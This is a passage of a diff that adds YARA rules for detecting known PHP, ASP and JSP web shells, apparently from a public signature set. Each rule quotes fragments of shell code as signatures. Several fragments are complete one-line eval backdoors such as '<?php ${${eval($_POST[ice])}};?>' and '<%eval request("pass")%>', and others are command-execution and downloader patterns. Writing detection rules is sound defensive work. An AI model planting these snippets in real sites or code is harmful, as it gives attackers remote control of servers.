+		hash = "7edefb8bd0876c41906f4b39b52cd0ef"
+	strings:
+		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
+		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
+		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
+	condition:
+		2 of them
+}
+rule webshell_Mysql_interface_v1_0 {
+	meta:
+		description = "Web Shell - file Mysql interface v1.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a12fc0a3d31e2f89727b9678148cd487"
+	strings:
+		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
+	condition:
+		all of them
+}
+rule webshell_php_s_u {
+	meta:
+		description = "Web Shell - file s-u.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
+	strings:
+		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
+	condition:
+		all of them
+}
+rule webshell_phpshell_2_1_config {
+	meta:
+		description = "Web Shell - file config.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bd83144a649c5cc21ac41b505a36a8f3"
+	strings:
+		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
+	condition:
+		all of them
+}
+rule webshell_asp_EFSO_2 {
+	meta:
+		description = "Web Shell - file EFSO_2.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
+	condition:
+		all of them
+}
+rule webshell_jsp_up {
+	meta:
+		description = "Web Shell - file up.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "515a5dd86fe48f673b72422cccf5a585"
+	strings:
+		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
+	condition:
+		all of them
+}
+rule webshell_NetworkFileManagerPHP {
+	meta:
+		description = "Web Shell - file NetworkFileManagerPHP.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
+	strings:
+		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
+	condition:
+		all of them
+}
+rule webshell_Server_Variables {
+	meta:
+		description = "Web Shell - file Server Variables.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "47fb8a647e441488b30f92b4d39003d7"
+	strings:
+		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
+		$s9 = "Variable Name</B></font></p>" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_ice_2 {
+	meta:
+		description = "Web Shell - file ice.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1d6335247f58e0a5b03e17977888f5f2"
+	strings:
+		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_mdb {
+	meta:
+		description = "Web Shell - file mdb.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
+	strings:
+		$s1 = "<% execute request(\"ice\")%>a " fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_guige {
+	meta:
+		description = "Web Shell - file guige.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2c9f2dafa06332957127e2c713aacdd2"
+	strings:
+		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
+	condition:
+		all of them
+}
+rule webshell_phpspy2010 {
+	meta:
+		description = "Web Shell - file phpspy2010.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "14ae0e4f5349924a5047fed9f3b105c5"
+	strings:
+		$s3 = "eval(gzinflate(base64_decode("
+		$s5 = "//angel" fullword
+		$s8 = "$admin['cookiedomain'] = '';" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_ice {
+	meta:
+		description = "Web Shell - file ice.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d141e011a92f48da72728c35f1934a2b"
+	strings:
+		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
+	condition:
+		all of them
+}
+rule webshell_drag_system {
+	meta:
+		description = "Web Shell - file system.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "15ae237cf395fb24cf12bff141fb3f7c"
+	strings:
+		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
+	condition:
+		all of them
+}
+rule webshell_DarkBlade1_3_asp_indexx {
+	meta:
+		description = "Web Shell - file indexx.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b7f46693648f534c2ca78e3f21685707"
+	strings:
+		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
+	condition:
+		all of them
+}
+rule webshell_phpshell3 {
+	meta:
+		description = "Web Shell - file phpshell3.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "76117b2ee4a7ac06832d50b2d04070b8"
+	strings:
+		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
+		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
+		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
+	condition:
+		2 of them
+}
+rule webshell_jsp_hsxa {
+	meta:
+		description = "Web Shell - file hsxa.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
+	strings:
+		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+	condition:
+		all of them
+}
+rule webshell_jsp_utils {
+	meta:
+		description = "Web Shell - file utils.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9827ba2e8329075358b8e8a53e20d545"
+	strings:
+		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_asp_01 {
+	meta:
+		description = "Web Shell - file 01.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 50
+		hash = "61a687b0bea0ef97224c7bd2df118b87"
+	strings:
+		$s0 = "<%eval request(\"pass\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_404 {
+	meta:
+		description = "Web Shell - file 404.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
+	strings:
+		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
+	condition:
+		all of them
+}
+rule webshell_webshell_cnseay02_1 {
+	meta:
+		description = "Web Shell - file webshell-cnseay02-1.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "95fc76081a42c4f26912826cb1bd24b1"
+	strings:
+		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
+	condition:
+		all of them
+}
+rule webshell_php_fbi {
+	meta:
+		description = "Web Shell - file fbi.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1fb32f8e58c8deb168c06297a04a21f1"
+	strings:
+		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
+	condition:
+		all of them
+}
+rule webshell_B374kPHP_B374k {
+	meta:
+		description = "Web Shell - file B374k.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bed7388976f8f1d90422e8795dff1ea6"
+	strings:
+		$s0 = "Http://code.google.com/p/b374k-shell" fullword
+		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
+		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
+		$s4 = "B374k Vip In Beautify Just For Self" fullword
+	condition:
+		1 of them
+}
+rule webshell_cmd_asp_5_1 {
+	meta:
+		description = "Web Shell - file cmd-asp-5.1.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+	strings:
+		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+	condition:
+		all of them
+}
+rule webshell_php_dodo_zip {
+	meta:
+		description = "Web Shell - file zip.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b7800364374077ce8864796240162ad5"
+	strings:
+		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
+		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
+	condition:
+		all of them
+}
+rule webshell_aZRaiLPhp_v1_0 {
+	meta:
+		description = "Web Shell - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "26b2d3943395682e36da06ed493a3715"
+	strings:
+		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
+		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
+	condition:
+		all of them
+}
+rule webshell_php_list {
+	meta:
+		description = "Web Shell - file list.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "922b128ddd90e1dc2f73088956c548ed"
+	strings:
+		$s1 = "// list.php = Directory & File Listing" fullword
+		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
+		$s9 = "// by: The Dark Raver" fullword
+	condition:
+		1 of them
+}
+rule webshell_ironshell {
+	meta:
+		description = "Web Shell - file ironshell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+	strings:
+		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
+		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
+	strings:
+		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
+	condition:
+		all of them
+}
+rule webshell_ASP_aspydrv {
+	meta:
+		description = "Web Shell - file aspydrv.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "de0a58f7d1e200d0b2c801a94ebce330"
+	strings:
+		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
+	condition:
+		all of them
+}
+rule webshell_jsp_web {
+	meta:
+		description = "Web Shell - file web.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
+	strings:
+		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
+	condition:
+		all of them
+}
+rule webshell_mysqlwebsh {
+	meta:
+		description = "Web Shell - file mysqlwebsh.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "babfa76d11943a22484b3837f105fada"
+	strings:
+		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
+	condition:
+		all of them
+}
+rule webshell_jspShell {
+	meta:
+		description = "Web Shell - file jspShell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
+	strings:
+		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
+		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
+	condition:
+		all of them
+}
+rule webshell_Dx_Dx {
+	meta:
+		description = "Web Shell - file Dx.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+	strings:
+		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s9 = "class=linelisting><nobr>POST (php eval)</td><"
+	condition:
+		1 of them
+}
+rule webshell_asp_ntdaddy {
+	meta:
+		description = "Web Shell - file ntdaddy.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c5e6baa5d140f73b4e16a6cfde671c68"
+	strings:
+		$s9 =  "if  FP  =  \"RefreshFolder\"  or  "
+		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
+	condition:
+		1 of them
+}
+rule webshell_MySQL_Web_Interface_Version_0_8 {
+	meta:
+		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+	strings:
+		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
+	condition:
+		all of them
+}
+rule webshell_elmaliseker_2 {
+	meta:
+		description = "Web Shell - file elmaliseker.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+	strings:
+		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
+		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
+	condition:
+		all of them
+}
+rule webshell_ASP_RemExp {
+	meta:
+		description = "Web Shell - file RemExp.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+	strings:
+		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
+		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
+	condition:
+		all of them
+}
+rule webshell_jsp_list1 {
+	meta:
+		description = "Web Shell - file list1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
+	strings:
+		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
+		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
+	condition:
+		all of them
+}
+rule webshell_phpkit_1_0_odd {
+	meta:
+		description = "Web Shell - file odd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
+	strings:
+		$s0 = "include('php://input');" fullword
+		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
+		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_123 {
+	meta:
+		description = "Web Shell - file 123.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c691f53e849676cac68a38d692467641"
+	strings:
+		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
+		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
+	condition:
+		all of them
+}
+rule webshell_asp_1 {
+	meta:
+		description = "Web Shell - file 1.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8991148adf5de3b8322ec5d78cb01bdb"
+	strings:
+		$s4 = "!22222222222222222222222222222222222222222222222222" fullword
+		$s8 = "<%eval request(\"pass\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_ASP_tool {
+	meta:
+		description = "Web Shell - file tool.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4ab68d38527d5834e9c1ff64407b34fb"
+	strings:
+		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
+		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
+		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
+	condition:
+		2 of them
+}
+rule webshell_cmd_win32 {
+	meta:
+		description = "Web Shell - file cmd_win32.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
+	strings:
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
+		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+	condition:
+		2 of them
+}
+rule webshell_jsp_jshell {
+	meta:
+		description = "Web Shell - file jshell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "124b22f38aaaf064cef14711b2602c06"
+	strings:
+		$s0 = "kXpeW[\"" fullword
+		$s4 = "[7b:g0W@W<" fullword
+		$s5 = "b:gHr,g<" fullword
+		$s8 = "RhV0W@W<" fullword
+		$s9 = "S_MR(u7b" fullword
+	condition:
+		all of them
+}
+rule webshell_ASP_zehir4 {
+	meta:
+		description = "Web Shell - file zehir4.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "7f4e12e159360743ec016273c3b9108c"
+	strings:
+		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
+	condition:
+		all of them
+}
+rule webshell_wsb_idc {
+	meta:
+		description = "Web Shell - file idc.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "7c5b1b30196c51f1accbffb80296395f"
+	strings:
+		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
+		$s3 = "{eval($_GET['idc']);}" fullword
+	condition:
+		1 of them
+}
+rule webshell_cpg_143_incl_xpl {
+	meta:
+		description = "Web Shell - file cpg_143_incl_xpl.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5937b131b67d8e0afdbd589251a5e176"
+	strings:
+		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
+		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
+	condition:
+		1 of them
+}
+rule webshell_mumaasp_com {
+	meta:
+		description = "Web Shell - file mumaasp.com.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "cce32b2e18f5357c85b6d20f564ebd5d"
+	strings:
+		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
+	condition:
+		all of them
+}
+rule webshell_php_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ced050df5ca42064056a7ad610a191b3"
+	strings:
+		$s0 = "$pass = md5(md5(md5($pass)));" fullword
+	condition:
+		all of them
+}
+rule webshell_webshell_cnseay_x {
+	meta:
+		description = "Web Shell - file webshell-cnseay-x.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
+	strings:
+		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
+	condition:
+		all of them
+}
+rule webshell_asp_up {
+	meta:
+		description = "Web Shell - file up.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "f775e721cfe85019fe41c34f47c0d67c"
+	strings:
+		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
+		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
+	condition:
+		1 of them
+}
+rule webshell_phpkit_0_1a_odd {
+	meta:
+		description = "Web Shell - file odd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3c30399e7480c09276f412271f60ed01"
+	strings:
+		$s1 = "include('php://input');" fullword
+		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+		$s4 = "// uses include('php://input') to execute arbritary code" fullword
+		$s5 = "// php://input based backdoor" fullword
+	condition:
+		2 of them
+}
+rule webshell_ASP_cmd {
+	meta:
+		description = "Web Shell - file cmd.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "97af88b478422067f23b001dd06d56a9"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_Shell_x3 {
+	meta:
+		description = "Web Shell - file PHP Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+	strings:
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
+	condition:
+		2 of them
+}
+rule webshell_PHP_g00nv13 {
+	meta:
+		description = "Web Shell - file g00nv13.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "35ad2533192fe8a1a76c3276140db820"
+	strings:
+		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
+		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
+	condition:
+		all of them
+}
+rule webshell_php_h6ss {
+	meta:
+		description = "Web Shell - file h6ss.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "272dde9a4a7265d6c139287560328cd5"
+	strings:
+		$s0 = "<?php eval(gzuncompress(base64_decode(\""
+	condition:
+		all of them
+}
+rule webshell_jsp_zx {
+	meta:
+		description = "Web Shell - file zx.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "67627c264db1e54a4720bd6a64721674"
+	strings:
+		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
+	condition:
+		all of them
+}
+rule webshell_Ani_Shell {
+	meta:
+		description = "Web Shell - file Ani-Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "889bfc9fbb8ee7832044fc575324d01a"
+	strings:
+		$s0 = "$Python_CODE = \"I"
+		$s6 = "$passwordPrompt = \"\\n================================================="
+		$s7 = "fputs ($sockfd ,\"\\n==============================================="
+	condition:
+		1 of them
+}
+rule webshell_jsp_k8cmd {
+	meta:
+		description = "Web Shell - file k8cmd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b39544415e692a567455ff033a97a682"
+	strings:
+		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_cmd {
+	meta:
+		description = "Web Shell - file cmd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5391c4a8af1ede757ba9d28865e75853"
+	strings:
+		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_k81 {
+	meta:
+		description = "Web Shell - file k81.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "41efc5c71b6885add9c1d516371bd6af"
+	strings:
+		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
+		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
+	condition:
+		1 of them
+}
+rule webshell_ASP_zehir {
+	meta:
+		description = "Web Shell - file zehir.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0061d800aee63ccaf41d2d62ec15985d"
+	strings:
+		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
+	condition:
+		all of them
+}
+rule webshell_Worse_Linux_Shell {
+	meta:
+		description = "Web Shell - file Worse Linux Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+	strings:
+		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
+	condition:
+		all of them
+}
+rule webshell_zacosmall {
+	meta:
+		description = "Web Shell - file zacosmall.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+	strings:
+		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
+	condition:
+		all of them
+}
+rule webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
+	meta:
+		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+	strings:
+		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+	condition:
+		all of them
+}
+rule webshell_redirect {
+	meta:
+		description = "Web Shell - file redirect.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "97da83c6e3efbba98df270cc70beb8f8"
+	strings:
+		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
+	condition:
+		all of them
+}
+rule webshell_jsp_cmdjsp {
+	meta:
+		description = "Web Shell - file cmdjsp.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b815611cc39f17f05a73444d699341d4"
+	strings:
+		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+	condition:
+		all of them
+}
+rule webshell_Java_Shell {
+	meta:
+		description = "Web Shell - file Java Shell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+	strings:
+		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
+		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
+	condition:
+		1 of them
+}
+rule webshell_asp_1d {
+	meta:
+		description = "Web Shell - file 1d.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "fad7504ca8a55d4453e552621f81563c"
+	strings:
+		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
+	condition:
+		all of them
+}
+rule webshell_jsp_IXRbE {
+	meta:
+		description = "Web Shell - file IXRbE.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e26e7e0ebc6e7662e1123452a939e2cd"
+	strings:
+		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+	condition:
+		all of them
+}
+rule webshell_PHP_G5 {
+	meta:
+		description = "Web Shell - file G5.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "95b4a56140a650c74ed2ec36f08d757f"
+	strings:
+		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
+	condition:
+		all of them
+}
+rule webshell_PHP_r57142 {
+	meta:
+		description = "Web Shell - file r57142.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
+	strings:
+		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_tree {
+	meta:
+		description = "Web Shell - file tree.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
+	strings:
+		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
+		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
+	condition:
+		all of them
+}
+rule webshell_C99madShell_v_3_0_smowu {
+	meta:
+		description = "Web Shell - file smowu.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "74e1e7c7a6798f1663efb42882b85bee"
+	strings:
+		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
+		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
+	condition:
+		1 of them
+}
+rule webshell_simple_backdoor {
+	meta:
